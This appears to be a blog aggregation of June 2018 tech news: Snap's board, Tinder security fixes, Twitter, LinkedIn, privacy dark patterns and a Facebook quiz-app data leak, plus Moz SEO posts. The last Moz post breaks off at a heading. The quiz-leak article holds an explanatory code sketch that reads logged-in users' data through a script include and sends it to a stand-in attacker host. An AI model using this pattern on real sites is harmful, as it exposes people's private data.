Saturday, 30 June 2018

Benchmark’s Mitch Lasky will reportedly step down from Snap’s board of directors

Benchmark partner Mitch Lasky, who has served on Snap’s board of directors since December 2012, is not expected to stand for re-election and will thus be stepping down from the board, according to a report by The Information.

Early investors stepping down from the board of directors — or at least not seeking re-election — isn’t that uncommon as once-private companies grow into larger public ones. Benchmark partner Peter Fenton did not seek re-election to Twitter’s board of directors in April last year. As Snap continues to navigate its future, especially with its valuation having declined precipitously since going public to around $16.5 billion, partners whose expertise lies in the early and later stages of the startup life cycle may find themselves more useful taking a back seat and focusing on other investments. The voting process for board member re-election happens during the company’s annual meeting, so we’ll get more information when an additional proxy filing comes out ahead of the meeting later this year.

Benchmark is, or at least was when Snap went public last year, one of the company’s biggest shareholders. According to Snap’s 424B filing ahead of its March 2017 IPO, Benchmark owned 23.1% of Snap’s Class B common stock and 8.2% of its Class A common stock. Lasky has been with Benchmark since April 2007 and also serves on the boards of a number of gaming companies, including Riot Games and thatgamecompany, the creator of the PlayStation titles Flower and Journey. At the time, Snap said in its filing that Lasky was “qualified to serve as a member of our board of directors due to his extensive experience with social media and technology companies, as well as his experience as a venture capitalist investing in technology companies.”

The timing could be totally coincidental, but an earlier Recode report suggested Lasky had been discussing stepping back from future Benchmark funds. The firm only recently wrapped up a very public battle with Uber, which ended with Benchmark selling a significant stake in the company and a new CEO coming in to replace co-founder Travis Kalanick. Benchmark also hired its first female general partner, Sarah Tavel, earlier this year.

We’ve reached out to both Snap and a representative from Benchmark for comment and will update the story when we hear back.



source https://techcrunch.com/2018/06/29/benchmarks-mitch-lasky-will-reportedly-step-down-from-snaps-board-of-directors/

Friday, 29 June 2018

Tinder bolsters its security to ward off hacks and blackmail

This week, Tinder responded to a letter from Oregon Senator Ron Wyden calling for the company to seal up security loopholes in its app that could lead to blackmail and other privacy incursions.

In a letter to Sen. Wyden, Match Group General Counsel Jared Sine describes recent changes to the app, noting that as of June 19, “swipe data has been padded such that all actions are now the same size.” Sine added that images on the mobile app are fully encrypted as of February 6, while images on the web version of Tinder were already encrypted.
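The padding change addresses traffic analysis: even when requests are encrypted, an observer on the same network could previously tell swipe actions apart simply by how many bytes each one sent, which is why all actions are now padded to an identical size. Below is a minimal sketch of that idea in TypeScript; the payload shape and the fixed size are assumptions for illustration, not Tinder's actual implementation.

    // Minimal sketch of payload padding, purely illustrative (not Tinder's code).
    // If every action serializes to the same length, a network observer can no longer
    // distinguish a "like" from a "pass" by packet size alone.
    const PADDED_LENGTH = 2048; // assumed fixed size, chosen arbitrarily

    function padAction(action: { type: "like" | "pass"; targetId: string }): string {
      const body = JSON.stringify(action);
      if (body.length > PADDED_LENGTH) {
        throw new Error("payload exceeds padded size");
      }
      // Append filler so every serialized action is exactly PADDED_LENGTH characters.
      return body + " ".repeat(PADDED_LENGTH - body.length);
    }

    console.log(padAction({ type: "like", targetId: "abc123" }).length); // 2048
    console.log(padAction({ type: "pass", targetId: "xyz789" }).length); // 2048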

The Tinder issues were first called out in a report by a research team at Checkmarx describing the app’s “disturbing vulnerabilities” and their propensity for blackmail:

“The vulnerabilities, found in both the app’s Android and iOS versions, allow an attacker using the same network as the user to monitor the user’s every move on the app. It is also possible for an attacker to take control over the profile pictures the user sees, swapping them for inappropriate content, rogue advertising or other type of malicious content (as demonstrated in the research).

“While no credential theft and no immediate financial impact are involved in this process, an attacker targeting a vulnerable user can blackmail the victim, threatening to expose highly private information from the user’s Tinder profile and actions in the app.”

In February, Wyden called for Tinder to address the vulnerability by encrypting all data that moves between its servers and the app and by padding data to obscure it from hackers. In a statement to TechCrunch at the time, Tinder indicated that it heard Sen. Wyden’s concerns and had recently implemented encryption for profile photos in the interest of moving toward deepening its privacy practices.

“Like every technology company, we are constantly working to improve our defenses in the battle against malicious hackers and cyber criminals,” Sine said in the letter. “… Our goal is to have protocols and systems that not only meet, but exceed industry best practices.”



source https://techcrunch.com/2018/06/29/tinder-security-update/

Twitter gets a re-org and new product head

Twitter has a new head of product in the wake of a large re-org of the company announced this week. The changes will see Twitter dividing its business into groups including engineering, product, revenue product, design and research, and more, while also elevating Kayvon Beykpour, the GM of video and former Periscope CEO, to product head.

Beykpour will replace Ed Ho, vice president of product and engineering, as Ho steps down into a part-time role. In a series of tweets, Ho explains his decision was based on a family loss, and says he hopes to return full-time in the future. He had been on leave from Twitter since May.

As Recode noted, these changes will make Beykpour the sixth exec to head up product since early 2014.

Meanwhile, Ho’s other role — head of engineering — will now be overseen by Mike Montano, who is stepping up from product engineering.

Twitter CEO Jack Dorsey’s announcement of the changes, below, was tweeted out on Thursday:



source https://techcrunch.com/2018/06/29/twitter-gets-a-re-org-and-new-product-head/

What Do SEOs Do When Google Removes Organic Search Traffic? - Whiteboard Friday

Posted by randfish

We rely pretty heavily on Google, but some of their decisions of late have made doing SEO more difficult than it used to be. Which organic opportunities have been taken away, and what are some potential solutions? Rand covers a rather unsettling trend for SEO in this week's Whiteboard Friday.

What Do SEOs Do When Google Removes Organic Search?


Video Transcription

Howdy, Moz fans, and welcome to another edition of Whiteboard Friday. This week we're talking about something kind of unnerving. What do we, as SEOs, do as Google is removing organic search traffic?

So for the last 19 or 20 years that Google has been around, every month Google has had, at least seasonally adjusted, not just more searches, but they've sent more organic traffic than they did that month the year before. So this has been on a steady incline. There's always been more opportunity in Google search until recently, and that is because of a bunch of moves, not that Google is losing market share, not that they're receiving fewer searches, but that they are doing things that make SEO a lot harder.

Some scary news

Things like...

  • Aggressive "answer" boxes. So you search for a question, and Google provides not just necessarily a featured snippet, which can earn you a click-through, but a box that truly answers the searcher's question, that comes directly from Google themselves, or a set of card-style results that provides a list of all the things that the person might be looking for.
  • Google is moving into more and more aggressively commercial spaces, like jobs, flights, products, all of these kinds of searches where previously there was opportunity and now there's a lot less. If you're Expedia or you're Travelocity or you're Hotels.com or you're Cheapflights and you see what's going on with flight and hotel searches in particular, Google is essentially saying, "No, no, no. Don't worry about clicking anything else. We've got the answers for you right here."
  • We also saw for the first time a seasonally adjusted drop, a drop in total organic clicks sent. That was between August and November of 2017. It was thanks to the Jumpshot dataset. It happened at least here in the United States. We don't know if it's happened in other countries as well. But that's certainly concerning because that is not something we've observed in the past. There were fewer clicks sent than there were previously. That makes us pretty concerned. It didn't go down very much. It went down a couple of percentage points. There's still a lot more clicks being sent in 2018 than there were in 2013. So it's not like we've dipped below something, but concerning.
  • New zero-result SERPs. We absolutely saw those for the first time. Google rolled them back after rolling them out. But, for example, if you search for the time in London or a Lagavulin 16, Google was showing no results at all, just a little box with the time and then potentially some AdWords ads. So zero organic results, nothing for an SEO to even optimize for in there.
  • Local SERPs that remove almost all need for a website. Then local SERPs, which have been getting more and more aggressively tuned so that you never need to click the website, and, in fact, Google has made it harder and harder to find the website in both mobile and desktop versions of local searches. So if you search for Thai restaurant and you try and find the website of the Thai restaurant you're interested in, as opposed to just information about them in Google's local pack, that's frustratingly difficult. They are making those more and more aggressive and putting them more forward in the results.

Potential solutions for marketers

So, as a result, I think search marketers really need to start thinking about: What do we do as Google is taking away this opportunity? How can we continue to compete and provide value for our clients and our companies? I think there are three big sort of paths — I won't get into the details of the paths — but three big paths that we can pursue.

1. Invest in demand generation for your brand + branded product names to leapfrog declines in unbranded search.

The first one is pretty powerful and pretty awesome, which is investing in demand generation, rather than just demand serving, but demand generation for brand and branded product names. Why does this work? Well, because let's say, for example, I'm searching for SEO tools. What do I get? I get back a list of results from Google with a bunch of mostly articles saying these are the top SEO tools. In fact, Google has now made a little one box, card-style list result up at the top, the carousel that shows different brands of SEO tools. I don't think Moz is actually listed in there because I think they're pulling from the second or the third lists instead of the first one. Whatever the case, frustrating, hard to optimize for. Google could take away demand from it or click-through rate opportunity from it.

But if someone performs a search for Moz, well, guess what? I mean we can nail that sucker. We can definitely rank for that. Google is not going to take away our ability to rank for our own brand name. In fact, Google knows that, in the navigational search sense, they need to provide the website that the person is looking for front and center. So if we can create more demand for Moz than there is for SEO tools, which I think there's something like 5 or 10 times more demand already for Moz than there is tools, according to Google Trends, that's a great way to go. You can do the same thing through your content, through your social media, and through your email marketing. Even through search you can search and create demand for your brand rather than unbranded terms.

2. Optimize for additional platforms.

Second thing, optimizing across additional platforms. So we've looked, and YouTube and Google Images account for about half of the overall volume that goes to Google web search. So between these two platforms, you've got a significant amount of additional traffic that you can optimize for. Images has actually gotten less aggressive. Right now they've taken away the "view image directly" link so that more people are visiting websites via Google Images. YouTube, obviously, this is a great place to build brand affinity, to build awareness, to create demand, this kind of demand generation to get your content in front of people. So these two are great platforms for that.

There are also significant amounts of web traffic still on the social web — LinkedIn, Facebook, Twitter, Pinterest, Instagram, etc., etc. The list goes on. Those are places where you can optimize, put your content forward, and earn traffic back to your websites.

3. Optimize the content that Google does show.

Local

So if you're in the local space and you're saying, "Gosh, Google has really taken away the ability for my website to get the clicks that it used to get from Google local searches," go into Google My Business and optimize the information you provide there so that people who perform that query are satisfied by Google's result. Yes, they won't get to your website, but they will still come to your business, because you've optimized the content Google is showing through Google My Business so that those searchers want to engage with you. I think this sometimes gets lost in the SEO battle. We're trying so hard to earn the click to our site that we're forgetting that a lot of search experience ends right at the SERP itself, and we can optimize there too.

Results

In the zero-results sets, Google was still willing to show AdWords, which means that if we have customer targets, we can use remarketing lists for search ads (RLSA), or we can run paid ads and still optimize for those. We could also try to claim some of the data that might show up in zero-result SERPs. We don't yet know what that will be after Google rolls it back out, but we'll find out in the future.

Answers

For answers, the answers that Google is giving, whether that's through voice or visually, those can be curated and crafted through featured snippets, through the card lists, and through the answer boxes. We have the opportunity again to influence, if not control, what Google is showing in those places, even when the search ends at the SERP.

All right, everyone, thanks for watching for this edition of Whiteboard Friday. We'll see you again next week. Take care.

Video transcription by Speechpad.com





source https://moz.com/blog/google-removing-organic-traffic

Thursday, 28 June 2018

Twitter launches its Ads Transparency Center, where you can see ads bought by any account

Twitter is unveiling the Ads Transparency Center that it announced back in October.

This comes as Twitter and other online platforms have faced growing political scrutiny around the role they may have played in spreading misinformation, particularly in the 2016 U.S. presidential election.

For example, House Democrats recently released thousands of Russian-funded political Facebook ads, and Facebook will reportedly release its own ad transparency tool this week. (In fact, as this story publishes, I’m at a Facebook press event focused on ad transparency.)

Twitter says that with this tool, you should be able to search for any Twitter handle and bring up all the ad campaigns from that account that have run for the past seven days. For political advertisers in the U.S., there will be additional data, including information around billing, ad spend, impressions per tweet and demographic targeting.

Everyone should be able to access the Ads Transparency Center, no login required.

Twitter political ads

As part of the political ad guidelines that Twitter announced last month, the company says it will be visually identifying ads that are tied to federal elections in the United States. Over time, it plans to develop a policy specifically around “issue ads” (i.e., political ads that aren’t explicitly promoting a candidate) and to look for ways to expand these policies internationally.

“We are doing our due diligence to get this right and will have more updates to come,” writes Twitter’s Bruce Falck in a blog post. “We stay committed to iterating and improving our work in this space, and doing what’s right for our community.”



source https://techcrunch.com/2018/06/28/twitter-ads-transparency-center/

LinkedIn adds Microsoft-powered translations and QR codes to connect more of its users faster

LinkedIn — the social network with more than 560 million members who connect around work-related topics and job-seeking — continues to add more features, integrating technology from its new owner Microsoft, both to improve engagement on LinkedIn as well as to create deeper data ties between the two businesses.

Today, the company announced two more: users can now instantly view translations of content on the site when it appears in a language that is not the one set as a default; and they can now use QR codes to quickly swap contact details with other LinkedIn members.

In both cases, the features are likely overdue. The lingua franca of LinkedIn seems to be English, but the platform has a large global reach, and as it continues to try to expand to a wider range of later adopters and different categories of users, having a translation feature is a no-brainer. It would also bring it more in line with the likes of Twitter and Facebook, which have had translation options for years.

QR codes, meanwhile, have become a key way for people to swap their details when they are not already connected on a network. And with LinkedIn this makes a lot of sense: there are so many people with the same name that it can be a challenge to figure out which “Mark Smith” you might want to connect with after coming across him at an event. And given that LinkedIn has been looking for more ways of making its app useful in in-person situations, this is an obvious way to enable that.

Translations are coming by way of the Microsoft Text Analytics API, the same Azure Cognitive Service that powers translations on Bing, Skype and Office (as well as third-party services like Twitter). LinkedIn says it will be available to a “majority” of members using either the desktop or mobile web versions of LinkedIn, in more than 60 languages, with more coming soon.

The company says that it will be coming to LinkedIn’s iOS and Android apps in due course as well. Users will get the “see translation” link based on a number of signals they provide to LinkedIn, including their language setting on the platform, the country where they are accessing content and the language used in their profile.

Content covered by the option to translate will include the main feed, the activity section on a person’s profile, and posts if you click on them in the feed or share them.

Meanwhile, with QR codes, you trigger the ability to capture one by clicking in the search box on the iOS or Android app. Through that window, you can also pick up your own code to share with others.

LinkedIn suggests that the QR code can effectively become the replacement for the business card for people when they are at in-person events. But another option is that you can use this now in any place where you might want to provide a shortcut to your profile.



source https://techcrunch.com/2018/06/28/linkedin-adds-microsoft-powered-translations-and-qr-codes-to-connect-more-of-its-users-faster/

Study calls out ‘dark patterns’ in Facebook and Google that push users toward less privacy

More scrutiny than ever is on the tech industry, and while high-profile cases like Mark Zuckerberg’s appearance in front of lawmakers garner headlines, there are subtler forces at work. This study from a Norwegian watchdog group eloquently and painstakingly describes the ways that companies like Facebook and Google push their users toward making choices that negatively affect their own privacy.

It was spurred, like many other new inquiries, by Europe’s GDPR, which has caused no small amount of consternation among companies for whom collecting and leveraging user data is their main source of income.

The report (PDF) goes into detail on exactly how these companies create an illusion of control over your data while simultaneously nudging you towards making choices that limit that control.

Although the companies and their products will be quick to point out that they are in compliance with the requirements of the GDPR, there are still plenty of ways in which they can be consumer-unfriendly.

In going through a set of privacy popups put out in May by Facebook, Google and Microsoft, the researchers found that the first two especially feature “dark patterns, techniques and features of interface design meant to manipulate users … used to nudge users towards privacy intrusive options.”

Flowchart illustrating the Facebook privacy options process – the green boxes are the “easy” route.

It’s not big obvious things — in fact, that’s the point of these “dark patterns”: that they are small and subtle yet effective ways of guiding people towards the outcome preferred by the designers.

For instance, in Facebook and Google’s privacy settings process, the more private options are simply disabled by default, and users not paying close attention will not know that there was a choice to begin with. You’re always opting out of things, not in. To enable these options is also a considerably longer process: 13 clicks or taps versus 4 in Facebook’s case.

That’s especially troubling when the companies are also forcing this action to take place at a time of their choosing, not yours. And Facebook added a cherry on top, almost literally, with the fake red dots that appeared behind the privacy popup, suggesting users had messages and notifications waiting for them even if that wasn’t the case.

When choosing the privacy-enhancing option, such as disabling face recognition, users are presented with a tailored set of consequences: “we won’t be able to use this technology if a stranger uses your photo to impersonate you,” for instance, to scare the user into enabling it. But nothing is said about what you will be opting into, such as how your likeness could be used in ad targeting or automatically matched to photos taken by others.

Disabling ad targeting on Google, meanwhile, warns you that you will not be able to mute some ads going forward. People who don’t understand the mechanism of muting being referred to here will be scared of the possibility — what if an ad pops up at work or during a show and I can’t mute it? So they agree to share their data.

Before you make a choice, you have to hear Facebook’s case.

In this way users are punished for choosing privacy over sharing, and are always presented only with a carefully curated set of pros and cons intended to cue the user to decide in favor of sharing. “You’re in control,” the user is constantly told, though those controls are deliberately designed to undermine what control you do have and exert.

Microsoft, while guilty of some of the same biased phrasing, received much better marks in the report. Its privacy setup process put the less and more private options right next to each other, presenting them as equally valid choices rather than as some tedious configuration tool that might break something if you’re not careful. Subtle cues do push users towards sharing more data or enabling voice recognition, but users aren’t punished or deceived the way they are elsewhere.

You may already have been aware of some of these tactics, as I was, but it makes for interesting reading nevertheless. We tend to discount these things when it’s just one screen here or there, but seeing them all together along with a calm explanation of why they are the way they are makes it rather obvious that there’s something insidious at play here.



source https://techcrunch.com/2018/06/27/study-calls-out-dark-patterns-in-facebook-and-google-that-push-users-towards-less-privacy/

Yet another massive Facebook fail: Quiz app leaked data on ~120M users for years

Facebook knows the historical app audit it’s conducting in the wake of the Cambridge Analytica data misuse scandal is going to result in a tsunami of skeletons tumbling out of its closet.

It’s already suspended around 200 apps as a result of the audit — which remains ongoing, with no formal timeline announced for when the process (and any associated investigations that flow from it) will be concluded.

CEO Mark Zuckerberg announced the audit on March 21, writing then that the company would “investigate all apps that had access to large amounts of information before we changed our platform to dramatically reduce data access in 2014, and we will conduct a full audit of any app with suspicious activity”.

But you do have to question how much the audit exercise is, first and foremost, intended to function as PR damage limitation for Facebook’s brand — given the company’s relaxed response to a data abuse report concerning a quiz app with ~120M monthly users, which it received right in the midst of the Cambridge Analytica scandal.

Because despite Facebook being alerted about the risk posed by the leaky quiz apps in late April — via its own data abuse bug bounty program — they were still live on its platform a month later.

It took about a further month for the vulnerability to be fixed.

And, sure, Facebook was certainly busy over that period. Busy dealing with a major privacy scandal.

Perhaps the company was putting rather more effort into pumping out a steady stream of crisis PR — including taking out full-page newspaper adverts (where it wrote that: “we have a responsibility to protect your information. If we can’t, we don’t deserve it”) — than into actually ‘locking down the platform’, as it has repeatedly claimed to be doing, even though the company’s long and rich privacy-hostile history suggests otherwise.

Let’s also not forget that, in early April, Facebook quietly confessed to a major security flaw of its own — when it admitted that an account search and recovery feature had been abused by “malicious actors” who, over what must have been a period of several years, had been able to surreptitiously collect personal data on a majority of Facebook’s ~2BN users — and use that intel for whatever they fancied.

So Facebook users already have plenty reasons to doubt the company’s claims to be able to “protect your information”. But this latest data fail facepalm suggests it’s hardly scrambling to make amends for its own stinkingly bad legacy either.

Change will require regulation. And in Europe that has arrived, in the form of the GDPR.

Although it remains to be seen whether Facebook will face any data breach complaints in this specific instance, i.e. for not disclosing to affected users that their information was at risk of being exposed by the leaky quiz apps.

The regulation came into force on May 25 — and the javascript vulnerability was not fixed until June. So there may be grounds for concerned consumers to complain.

Which Facebook data abuse victim am I?

Writing in a Medium post, the security researcher who filed the report — self-styled “hacker” Inti De Ceukelaire — explains he went hunting for data abusers on Facebook’s platform after the company announced a data abuse bounty on April 10, as the company scrambled to present a responsible face to the world following revelations that a quiz app running on its platform had surreptitiously harvested millions of users’ data — data that had been passed to a controversial UK firm which intended to use it to target political ads at US voters.

De Ceukelaire says he began his search by noting down what third party apps his Facebook friends were using — finding quizzes were one of the most popular apps. Plus he already knew quizzes had a reputation for being data-suckers in a distracting wrapper. So he took his first ever Facebook quiz, from a brand called NameTests.com, and quickly realized the company was exposing Facebook users’ data to “any third-party that requested it”.

The issue was that NameTests was displaying the quiz taker’s personal data (such as full name, location, age, birthday) in a javascript file — thereby potentially exposing the identity of, and other data on, logged-in Facebook users to any external website they happened to visit.

He also found it was providing an access token that allowed it to grant even more expansive data access permissions to third party websites — such as to users’ Facebook posts, photos and friends.

It’s not clear exactly why, but it presumably relates to the quiz app company’s own ad targeting activities. (Its privacy policy states: “We work together with various technological partners who, for example, display advertisements on the basis of user data. We make sure that the user’s data is pseudonymised (e.g. no clear data such as names or e-mail addresses) and that users have simple rights of revocation at their disposal. We also conclude special data protection agreements with our partners, in which they commit themselves to the protection of user data.” — which sounds great until you realize its javascript was leaking people’s personally identifiable data… [facepalm])

“Depending on what quizzes you took, the javascript could leak your facebook ID, first name, last name, language, gender, date of birth, profile picture, cover photo, currency, devices you use, when your information was last updated, your posts and statuses, your photos and your friends,” writes De Ceukelaire.
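The class of flaw described here is a script-include (JSONP-style) leak: because the quiz site served personal data as executable JavaScript rather than as same-origin-protected JSON, any page a logged-in victim visited could load that data and read it. The sketch below shows the general pattern from the attacker's side; the endpoint, callback and domain names are hypothetical, not NameTests' real ones.

    // Hypothetical attacker-page sketch of a script-include (JSONP-style) data leak.
    // Names and URLs are invented for illustration.

    // 1. Define a global callback the leaky third-party script will invoke.
    (window as any).onUserData = (user: { id: string; name: string; birthday: string }) => {
      // 2. The victim's profile data arrives here, inside the attacker's page, because
      //    the browser attached the victim's cookies to the script request below.
      void fetch("https://attacker.example/collect", {
        method: "POST",
        body: JSON.stringify(user),
      });
    };

    // 3. Load the third party's user-data endpoint as a <script> tag, which browsers
    //    will execute cross-origin (unlike a fetch of JSON, which CORS would block).
    const leakyScript = document.createElement("script");
    leakyScript.src = "https://quiz-provider.example/user-data.js?callback=onUserData";
    document.head.appendChild(leakyScript);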

He reckons people’s data had been publicly exposed since at least the end of 2016.

On Facebook, NameTests describes its purpose thusly: “Our goal is simple: To make people smile!” — adding that its quizzes are intended as a bit of “fun”.

It doesn’t shout so loudly that the ‘price’ for taking one of its quizzes, say to find out what Disney princess you ‘are’, or what you could look like as an oil painting, is not only that it will suck out masses of your personal data (and potentially your friends’ data) from Facebook’s platform for its own ad targeting purposes but was also, until recently, that your and other people’s information could have been exposed to goodness knows who, for goodness knows what nefarious purposes… 

The Facebook-Cambridge Analytica data misuse scandal has underlined that ostensibly frivolous social data can end up being repurposed for all sorts of manipulative and power-grabbing purposes. (And not only can end up, but that quizzes are deliberately built to be data-harvesting tools… So think of that the next time you get a ‘take this quiz’ notification asking ‘what is in your fact file?’ or ‘what has your date of birth imprinted on you’? And hope ads is all you’re being targeted for… )

De Ceukelaire found that NameTests would still reveal Facebook users’ identity even after its app was deleted.

“In order to prevent this from happening, the user would have had to manually delete the cookies on their device, since NameTests.com does not offer a log out functionality,” he writes.

“I would imagine you wouldn’t want any website to know who you are, let alone steal your information or photos. Abusing this flaw, advertisers could have targeted (political) ads based on your Facebook posts and friends. More explicit websites could have abused this flaw to blackmail their visitors, threatening to leak your sneaky search history to your friends,” he adds, fleshing out the risks for affected Facebook users.

As well as alerting Facebook to the vulnerability, De Ceukelaire says he contacted NameTests — and they claimed to have found no evidence of abuse by a third party. They also said they would make changes to fix the issue.

We’ve reached out to NameTests’ parent company — a German firm called Social Sweethearts — for comment. Its website touts a “data-driven approach” — and claims its portfolio of products achieve “a global organic reach of several billion page views per month”.

After De Ceukelaire reported the problem to Facebook, he says he received an initial response from the company on April 30 saying they were looking into it. Then, hearing nothing for some weeks, he sent a follow up email, on May 14, asking whether they had contacted the app developers.

A week later Facebook replied saying it could take three to six months to investigate the issue (i.e. the same timeframe mentioned in their initial automated reply), adding they would keep him in the loop.

Yet at that time — which was a month after his original report — the leaky NameTests quizzes were still up and running, meaning Facebook users’ data was still being exposed and at risk. And Facebook knew about the risk.

The next development came on June 25, when De Ceukelaire says he noticed NameTests had changed the way they process data to close down the access they had been exposing to third parties.

Two days later Facebook also confirmed the flaw in writing, admitting: “[T]his could have allowed an attacker to determine the details of a logged-in user to Facebook’s platform.”

It also told him it had confirmed with NameTests the issue had been fixed. And its apps continue to be available on Facebook’s platform — suggesting Facebook did not find the kind of suspicious activity that has led it to suspend other third party apps. (At least, assuming it conducted an investigation.)

Facebook paid out double its $4,000 bounty to a charity under the terms of its data abuse bug bounty program — and per De Ceukelaire’s request.

We asked Facebook what took it so long to respond to the data abuse report, especially given that the issue was so topical when De Ceukelaire filed it. But the company declined to answer specific questions.

Instead it sent us the following statement, attributed to Ime Archibong, its VP of product partnerships:

A researcher brought the issue with the nametests.com website to our attention through our Data Abuse Bounty Program that we launched in April to encourage reports involving Facebook data. We worked with nametests.com to resolve the vulnerability on their website, which was completed in June.

Facebook also claims it received De Ceukelaire’s report on April 27, rather than April 22, as he recounts it. Though it’s possible the former date is when Facebook’s own staff retrieved the report from its systems. 

Beyond displaying a disturbingly relaxed attitude to other people’s privacy — which risks getting Facebook into regulatory trouble, given GDPR’s strict requirements around breach disclosure, for example — the other core issue of concern here is the company’s apparent failure to enforce its own developer policy. 

The underlying issue is whether or not Facebook performs any checks on apps running on its platform. It’s no good having T&Cs if you don’t have any active processes to enforce your T&Cs. Rules without enforcement aren’t worth the paper they’re written on.

Historical evidence suggests Facebook did not actively enforce its developer T&Cs — even if it’s now “locking down the platform”, as it claims, as a result of so many privacy scandals. 

The quiz app developer at the center of the Cambridge Analytica scandal, Aleksandr Kogan — who harvested and sold/passed Facebook user data to third parties — has accused Facebook of essentially not having a policy. He contends it is therefore Facebook that is responsible for the massive data abuses that have played out on its platform — only a portion of which have so far come to light.

Fresh examples such as NameTests’ leaky quiz apps merely bolster the case Kogan made for Facebook being the guilty party where data misuse is concerned. After all, if you built some stables without any doors at all would you really blame your horses for bolting?



source https://techcrunch.com/2018/06/28/facepalm-2/

The Minimum Viable Knowledge You Need to Work with JavaScript & SEO Today

Posted by sergeystefoglo

If your work involves SEO at some level, you’ve most likely been hearing more and more about JavaScript and the implications it has on crawling and indexing. Frankly, Googlebot struggles with it, and many websites today utilize modern JavaScript to load in crucial content. Because of this, we need to be equipped to discuss this topic when it comes up in order to be effective.

The goal of this post is to equip you with the minimum viable knowledge required to do so. This post won’t go into the nitty gritty details, describe the history, or give you extreme detail on specifics. There are a lot of incredible write-ups that already do this — I suggest giving them a read if you are interested in diving deeper (I’ll link out to my favorites at the bottom).

In order to be effective consultants when it comes to the topic of JavaScript and SEO, we need to be able to answer three questions:

  1. Does the domain/page in question rely on client-side JavaScript to load/change on-page content or links?
  2. If yes, is Googlebot seeing the content that’s loaded in via JavaScript properly?
  3. If not, what is the ideal solution?

With some quick searching, I was able to find three examples of landing pages that utilize JavaScript to load in crucial content.

I’m going to be using Sitecore’s Symposium landing page through each of these talking points to illustrate how to answer the questions above.

We’ll cover the “how do I do this” aspect first, and at the end I’ll expand on a few core concepts and link to further resources.

Question 1: Does the domain in question rely on client-side JavaScript to load/change on-page content or links?

The first step to diagnosing any issues involving JavaScript is to check if the domain uses it to load in crucial content that could impact SEO (on-page content or links). Ideally this will happen anytime you get a new client (during the initial technical audit), or whenever your client redesigns/launches new features of the site.

How do we go about doing this?

Ask the client

Ask, and you shall receive! Seriously though, one of the quickest/easiest things you can do as a consultant is contact your POC (or developers on the account) and ask them. After all, these are the people who work on the website day-in and day-out!

“Hi [client], we’re currently doing a technical sweep on the site. One thing we check is if any crucial content (links, on-page content) gets loaded in via JavaScript. We will do some manual testing, but an easy way to confirm this is to ask! Could you (or the team) answer the following, please?

1. Are we using client-side JavaScript to load in important content?
2. If yes, can we get a bulleted list of where/what content is loaded in via JavaScript?”

Check manually

Even on a large e-commerce website with millions of pages, there are usually only a handful of important page templates. In my experience, it should only take an hour at most to check manually. I use the Web Developer Chrome extension, disable JavaScript from there, and manually check the important templates of the site (homepage, category page, product page, blog post, etc.).

In the example above, once we turn off JavaScript and reload the page, we can see that we are looking at a blank page.

As you make progress, jot down notes about content that isn’t being loaded in, is being loaded in wrong, or any internal linking that isn’t working properly.

At the end of this step we should know if the domain in question relies on JavaScript to load/change on-page content or links. If the answer is yes, we should also know where this happens (homepage, category pages, specific modules, etc.)

Crawl

You could also crawl the site (with a tool like Screaming Frog or Sitebulb) with JavaScript rendering turned off, then run the same crawl with JavaScript rendering turned on, and compare the differences in internal links and on-page elements.

For example, it could be that when you crawl the site with JavaScript rendering turned off, the title tags don’t appear. In my mind this would trigger an action to crawl the site with JavaScript rendering turned on to see if the title tags do appear (as well as checking manually).
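If you prefer to script the same comparison, the sketch below fetches a page's raw HTML and its JavaScript-rendered HTML and compares the title tags. It assumes Node.js with the node-fetch and puppeteer packages installed; the tooling choice is illustrative, and a crawler like Screaming Frog or Sitebulb does this for you at scale.

    // Rough sketch: compare raw HTML (no JS rendering) with rendered HTML (after JS runs).
    import fetch from "node-fetch";
    import puppeteer from "puppeteer";

    async function compareRawVsRendered(url: string): Promise<void> {
      // Raw HTML: roughly what a crawler sees with JavaScript rendering turned off.
      const rawHtml = await (await fetch(url)).text();

      // Rendered HTML: the DOM after client-side JavaScript has executed.
      const browser = await puppeteer.launch();
      const page = await browser.newPage();
      await page.goto(url, { waitUntil: "networkidle0" });
      const renderedHtml = await page.content();
      await browser.close();

      const title = (html: string) =>
        (html.match(/<title>([^<]*)<\/title>/i) || [])[1] || "(missing)";

      console.log("Raw title:      ", title(rawHtml));
      console.log("Rendered title: ", title(renderedHtml));
      console.log("Raw length:", rawHtml.length, "| Rendered length:", renderedHtml.length);
    }

    compareRawVsRendered("https://www.example.com/").catch(console.error);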

Example

For our example, I went ahead and did a manual check. As we can see from the screenshot below, when we disable JavaScript, the content does not load.

In other words, the answer to our first question for this page is “yes, JavaScript is being used to load in crucial parts of the site.”

Question 2: If yes, is Googlebot seeing the content that’s loaded in via JavaScript properly?

If your client is relying on JavaScript on certain parts of their website (in our example they are), it is our job to try and replicate how Google is actually seeing the page(s). We want to answer the question, “Is Google seeing the page/site the way we want it to?”

In order to get a more accurate depiction of what Googlebot is seeing, we need to attempt to mimic how it crawls the page.

How do we do that?

Use Google’s new mobile-friendly testing tool

At the moment, the quickest and most accurate way to try and replicate what Googlebot is seeing on a site is by using Google’s new mobile friendliness tool. My colleague Dom recently wrote an in-depth post comparing Search Console Fetch and Render, Googlebot, and the mobile friendliness tool. His findings were that most of the time, Googlebot and the mobile friendliness tool resulted in the same output.

In Google’s mobile friendliness tool, simply input your URL, hit “run test,” and then once the test is complete, click on “source code” on the right side of the window. You can take that code and search for any on-page content (title tags, canonicals, etc.) or links. If they appear here, Google is most likely seeing the content.

Search for visible content in Google

It’s always good to sense-check. Another quick way to check whether Googlebot has indexed content on your page is by simply selecting visible text on the page and doing a site:search for it in Google, with quotation marks around said text.

In our example there is visible text on the page that reads…

"Whether you are in marketing, business development, or IT, you feel a sense of urgency. Or maybe opportunity?"

When we do a site:search for this exact phrase, for this exact page, we get nothing. This means Google hasn’t indexed the content.

Crawling with a tool

Most crawling tools have the functionality to crawl JavaScript now. For example, in Screaming Frog you can head to Configuration > Spider > Rendering, select “JavaScript” from the dropdown, and hit save. DeepCrawl and Sitebulb both have this feature as well.

From here you can input your domain/URL and see the rendered page/code once your tool of choice has completed the crawl.

Example:

When attempting to answer this question, my preference is to start by inputting the domain into Google’s mobile friendliness tool, copying the source code, and searching for important on-page elements (think title tag, <h1>, body copy, etc.). It’s also helpful to use a tool like Diff Checker to compare the rendered HTML with the original HTML (Screaming Frog also has a function that lets you do this side by side).

For our example, here is what the output of the mobile friendliness tool shows us.

After a few searches, it becomes clear that important on-page elements are missing here.

We also did the second test and confirmed that Google hasn’t indexed the body content found on this page.

The implication at this point is that Googlebot is not seeing our content the way we want it to, which is a problem.

Let’s jump ahead and see what we can recommend the client.

Question 3: If we’re confident Googlebot isn’t seeing our content properly, what should we recommend?

